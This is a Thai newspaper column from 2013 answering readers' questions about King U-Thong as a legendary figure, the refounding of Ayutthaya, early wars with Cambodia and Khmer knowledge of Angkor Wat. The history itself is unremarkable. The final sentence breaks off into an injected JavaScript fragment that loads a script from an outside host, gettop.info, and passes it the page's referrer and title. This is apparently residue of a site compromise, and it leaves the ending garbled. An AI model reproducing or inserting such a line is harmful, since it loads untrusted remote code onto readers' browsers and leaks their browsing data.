มติชนรายวัน ฉบับประจำวันศุกร์ที่ 15 พฤศจิกายน 2556

 

พระเจ้าอู่ทอง ไม่มีตัวตนจริง

         อู่ทองสร้างอยุธยา มาจากขอมละโว้ (ฉบับวันศุกร์ที่ 8 พฤศจิกายน 2556) ผมเขียนบอกไว้แล้วโดยใส่วงเล็บ ว่า พระเจ้าอู่ทอง เป็นวีรบุรุษในตำนาน ไม่มีตัวตนอยู่จริง

         ขอให้ Sura-a Pansakul และ Montree ManUnited ที่ถามในเฟซบุ๊ก ไปเปิดอ่านใหม่ได้ และ Paddypure Sweetsphys เข้าใจถูกต้องแล้ว ว่ารามาธิบดี เชื้อสายขอมละโว้มีอยู่จริง แต่ถูกนักปราชญ์สมัยหลังบังคับให้เป็นพระเจ้าอู่ทอง

         เรื่องพระเจ้าอู่ทอง มีรายละเอียดปลีกย่อยอีกมาก ผมเคยรวบรวมไว้ในหนังสือชื่อพระเจ้าอู่ทอง ไม่ได้มาจากเมืองอู่ทอง (สำนักพิมพ์มติชน พิมพ์ครั้งแรก พ.ศ. 2545)

 

พระเจ้าอู่ทอง ตีได้เขมร เป็นนิทานแต่งใหม่

         Rick Chiang เขียนถามหลายข้อในเฟซบุ๊ก จะยกมาบอกเล่าไว้ตรงนี้แต่พอสมควร ดังนี้

         1. อยุธยา สถาปนาราว พ.ศ. 1893 เอาคนจำนวนมากมาจากไหน?

         บริเวณอยุธยาเป็นบ้านเมืองใหญ่มาก่อนนานแล้ว โดยเรียกอโยธยาศรีรามเทพ ตั้งแต่ราวหลัง พ.ศ. 1600 มีร่องรอยอยู่ในพงศาวดารเหนือ มีงานค้นคว้าวิชาการหลายเล่มยืนยันเรื่องนี้

         สมเด็จพระรามาธิบดี สถาปนากรุงศรีอยุธยาขึ้นใหม่ พ.ศ. 1893 บนเมืองเดิมของ อโยธยาศรีรามเทพ ไม่ใช่เริ่มต้นนับหนึ่งอย่างที่เข้าใจคลาดเคลื่อน

         ดังนั้น จึงมีประชาชนดั้งเดิมอยู่มากแล้ว เพราะตั้งอยู่บนชุมทางเส้นทางคมนาคมการค้า

         2. กษัตริย์ขอมจะมี“วรมัน” หรือไม่มี ก็ล้วนเกี่ยวดองเป็นเครือญาติอุปถัมภ์กับกษัตริย์อยุธยา, สุโขทัย, เวียงจัน, ฯลฯ แต่จะระดับไหน? ย่อมแตกต่างไป

         3. กษัตริย์ขอมนามว่า“Trosok Peam” เข้าใจว่าหมายถึงคนชื่อ ตระซอก ผะแอม ในตำนานคนเฝ้าสวนของพระราชา ที่ต่อมาได้เป็นกษัตริย์ขอมครองนครธม นับถือพุทธ เถรวาท จึงไม่ลงท้ายนามด้วย วรมัน ที่นับถือพราหมณ์ หรือพุทธ มหายาน เช่น ชัยวรมันที่ 7

         4. หลังสถาปนาอยุธยา 3 ปี พระเจ้าอู่ทองยกทัพไปตีขอมนครธม เป็นที่รับรู้กว้างขวางตามพระราชพงศาวดารที่เขียนสมัยกรุงเทพฯ

         แต่นักวิชาการทั้งไทยและต่างประเทศ สรุปเห็นพ้องต้องกันว่า อยุธยายกไปตีกัมพูชาครั้งแรกสุดสมัยเจ้าสามพระยา ไม่ใช่สมัยพระเจ้าอู่ทอง รามาธิบดี ซึ่งไม่มีหลักฐานยืนยัน จะมีก็แต่พระราชพงศาวดารที่เขียนสมัยกรุงเทพฯ ราว ร.4 ยกเหตุการณ์สมัยเจ้าสามพระยาไปเพิ่มให้อู่ทองรามาธิบดี ด้วยเหตุผลทางการเมืองยุคที่เขียนเพิ่ม

 

ชาวเขมร(ร่วมยุคอยุธยา) รู้จักนครวัดดีก่อนฝรั่ง

         กุเรปัน ธานี บอกในเฟซบุ๊กว่า “นครวัดได้หายสาบสูญไปจากความทรงจำของคนอุษาคเนย์ไปนานแล้ว ผู้คนสมัย ร.3 ไม่รู้ว่าบนโลกนี้มีนครวัด —–”

         แต่หลักฐานที่มีอยู่ ไม่เป็นอย่างที่ว่ามา เพราะจารึกนครวัดทำขึ้นเมื่อ พ.ศ. 2175 (ตรงกับแผ่นดินพระเจ้าปราสาททอง อยุธยา) อีกหลักหนึ่งทำขึ้นเมื่อ พ.ศ. 2214 (ตรงกับแผ่นดินสมเด็จพระนารายณ์ อยุธยา) ระบุชื่อ“พระนครวัด”        

         เท่ากับเป็นหลักฐานยืนยันว่าคนเขมรยุคอยุธยารู้จักปราสาทหิน(นครวัด)ในชื่อพระนครวัด ซึ่งจะกร่อนเป็นนครวัด ในปัจจุบัน

         ขอแนะนำให้อ่านรายละเอียดในบทความชื่อ นครวัด, เสียมเรียบ ชื่อนี้มาจากไหน? ใครเรียก โดย ศานติ ภักดีคำ อยู่ในหนังสือนครวัดทัศนะเขมร รวมบทรจนาเกี่ยวกับปราสาทนครวัด โดยกวีและนักปราชญ์เขมร พร้อมคำอธิบายของ จิตร ภูมิศักดิ์ (สำนักพิมพ์มติชน รวมพิมพ์ครั้งแรก พ.ศ. 2545)

         คนสุวรรณภูมิ โดยเฉพาะที่มีหลักแหล่งอยู่ใน ลาว, กัมพูชา, เวียดนาม, ไทย มีความทรงจำเรื่องนครวัดสืบเนื่องมาไม่ขาด

         ปัญหาอยู่ที่ผู้ศึกษาประวัติศาสตร์โบราณคดีสมัยหลังๆ โดยทั่วไปไม่รู้จักหลักฐานท้องถิ่น และไม่เคยค้นหา เพราะหลงไปว่าฝรั่งเท่านั้นรู้ที่สุด แล้วเป็นผู้ค้นพบนครวัด ซึ่งไม่จริง}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;